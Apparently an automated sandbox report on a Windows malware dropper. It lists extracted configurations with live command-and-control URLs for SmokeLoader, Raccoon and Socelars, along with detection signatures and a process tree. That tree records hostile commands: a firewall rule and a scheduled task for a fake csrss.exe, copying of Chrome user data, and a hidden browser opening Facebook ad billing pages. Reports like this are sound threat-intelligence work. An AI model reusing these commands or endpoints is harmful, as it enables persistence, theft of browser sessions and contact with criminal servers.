Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
04/10/2024, 18:01
241004-wl132axhpm 1022/04/2024, 20:52
240422-znvwksgb77 1027/02/2024, 22:40
240227-2lykssdc83 1003/01/2024, 09:53
240103-lw3dqscehj 1029/12/2023, 23:48
231229-3txtxadcb8 10Analysis
-
max time kernel
1s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29/12/2023, 23:48
Static task
static1
Behavioral task
behavioral1
Sample
078192e792b12a8d9980f364e110155c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
078192e792b12a8d9980f364e110155c.exe
Resource
win10v2004-20231215-en
General
-
Target
078192e792b12a8d9980f364e110155c.exe
-
Size
8.7MB
-
MD5
078192e792b12a8d9980f364e110155c
-
SHA1
89596e27530eeccd6ad9644aa045e8e0499301a1
-
SHA256
67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33
-
SHA512
72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc
-
SSDEEP
196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J
Malware Config
Extracted
smokeloader
pub2
Extracted
ffdroider
http://186.2.171.3
Extracted
metasploit
windows/single_exec
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
raccoon
1.7.3
92be0387873e54dd629b9bfa972c3a9a88e6726c
-
url4cnc
https://t.me/gishsunsetman
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral2/files/0x00080000000231e0-24.dat family_fabookie behavioral2/files/0x00080000000231e0-29.dat family_fabookie -
FFDroider payload 3 IoCs
resource yara_rule behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp family_ffdroider behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp family_ffdroider behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp family_ffdroider -
Glupteba payload 9 IoCs
resource yara_rule behavioral2/memory/452-189-0x0000000005240000-0x0000000005B66000-memory.dmp family_glupteba behavioral2/memory/452-192-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/452-198-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/452-202-0x0000000005240000-0x0000000005B66000-memory.dmp family_glupteba behavioral2/memory/5320-240-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/5320-272-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/1376-1421-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/1376-1441-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/1376-1998-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3748 4968 rUNdlL32.eXe 103 -
Raccoon Stealer V1 payload 4 IoCs
resource yara_rule behavioral2/memory/6644-1347-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral2/memory/6644-1348-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral2/memory/6644-1352-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral2/memory/6644-1350-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars payload 2 IoCs
resource yara_rule behavioral2/files/0x00060000000231e7-42.dat family_socelars behavioral2/files/0x00060000000231e7-50.dat family_socelars -
Nirsoft 3 IoCs
resource yara_rule behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp Nirsoft behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 5700 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation 078192e792b12a8d9980f364e110155c.exe -
Executes dropped EXE 2 IoCs
pid Process 3068 Files.exe 1196 KRSetp.exe -
resource yara_rule behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral2/memory/3348-179-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp upx behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp upx -
resource yara_rule behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect behavioral2/memory/3616-127-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 11 ipinfo.io 13 ipinfo.io 21 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1608 3372 WerFault.exe 110 5800 2340 WerFault.exe 96 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3228 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 87 Go-http-client/1.1 -
Kills process with taskkill 1 IoCs
pid Process 3480 taskkill.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 712 wrote to memory of 3068 712 078192e792b12a8d9980f364e110155c.exe 91 PID 712 wrote to memory of 3068 712 078192e792b12a8d9980f364e110155c.exe 91 PID 712 wrote to memory of 3068 712 078192e792b12a8d9980f364e110155c.exe 91 PID 712 wrote to memory of 1196 712 078192e792b12a8d9980f364e110155c.exe 94 PID 712 wrote to memory of 1196 712 078192e792b12a8d9980f364e110155c.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:3348
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:5216
-
-
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
PID:1196
-
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"2⤵PID:2900
-
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵PID:2340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 3683⤵
- Program crash
PID:5800
-
-
-
C:\Users\Admin\AppData\Local\Temp\Complete.exe"C:\Users\Admin\AppData\Local\Temp\Complete.exe"2⤵PID:1580
-
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS672⤵PID:2432
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xe0,0xe4,0xd8,0xdc,0x7ff9592046f8,0x7ff959204708,0x7ff9592047183⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:83⤵PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:33⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:13⤵PID:3864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:13⤵PID:3256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:23⤵PID:2036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:83⤵PID:5516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:83⤵PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:13⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:13⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:13⤵PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:13⤵PID:6120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3036 /prefetch:23⤵PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"2⤵PID:1648
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵PID:6644
-
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵PID:6636
-
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵PID:6628
-
-
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵PID:452
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"3⤵PID:5320
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:5916
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /94-944⤵PID:1376
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:3228
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵PID:2824
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵PID:2316
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:5168
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:3480
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y3⤵PID:1324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/3⤵PID:5864
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:5992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:1764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2216 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:84⤵PID:2796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:84⤵PID:2132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:24⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3528 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:1412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3344 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:5952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4948 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:6352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3584 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:84⤵PID:6096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:84⤵PID:6052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:24⤵PID:6856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a1⤵PID:1116
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1548
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵PID:3372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 6042⤵
- Program crash
PID:1608
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3372 -ip 33721⤵PID:2992
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:3748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2340 -ip 23401⤵PID:5768
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:5700
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff95b8b9758,0x7ff95b8b9768,0x7ff95b8b97781⤵PID:5892
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1804
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
180B
MD54bc8a3540a546cfe044e0ed1a0a22a95
SHA15387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf
-
Filesize
975KB
MD52d0217e0c70440d8c82883eadea517b9
SHA1f3b7dd6dbb43b895ba26f67370af99952b7d83cb
SHA256d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01
SHA5126d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d
-
Filesize
897KB
MD5f709715401ab7fe50bc780760bf9e3e5
SHA16d7193cfd1f546eda62a1609b9b8f52a72c3fc55
SHA256721ddafd3417eb0cf0e57076265bb124fdf00e2debc13e8bb0a27c89fdc808d2
SHA5126dfc5b0dea4a134271f7b36029d451259887d42334fb2ed6cf9c8adaef80370866f0e35e4f139225ac267f624c3ebf1e88cc75db2ab1a7baacf92ec84a8eb13a
-
Filesize
712KB
MD5b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
Filesize
381KB
MD55a8cac0f11af5d1f697fd4605b94340b
SHA126fc1b275094e6cf7926f82435463fca441e308a
SHA256d9772558c0555b9e531e50af984ab64b4e38af2917712acf5d96caafec05ec76
SHA5129f4d5c9247177bace98ddac536261f44e4301bdaf6ea03eb834855e65a1b65f27e295f56b2bd7145baa9321fc47b01d6dd0b41483ea89ee54427fed2ea92c311
-
Filesize
2.4MB
MD5e8d7444ace76d0133904769a90eba8f7
SHA1bcd825a99ac408b549bcdd39dad697375c3ec9b5
SHA256f733fd9bf7666ad08e4307bb589cdf4dc3db443203db7d80ce1de8055f917597
SHA512b1ea5a2611e5faad019a15f2c953d778f197400f21f62326010d9498fb321c6ed60081ae7607d3d3d17036c19bb997780ea0dbc95a2e329e06485a57fdc3b2a9
-
Filesize
1.9MB
MD54aea6c7f7ba606db6574190ff4748d39
SHA1100b67ccd32baaa184fc2f675c274947985d1483
SHA256ce727f7b573c110fbb6fdabf416800f2febd0733abfcbe18b102e4351aa95407
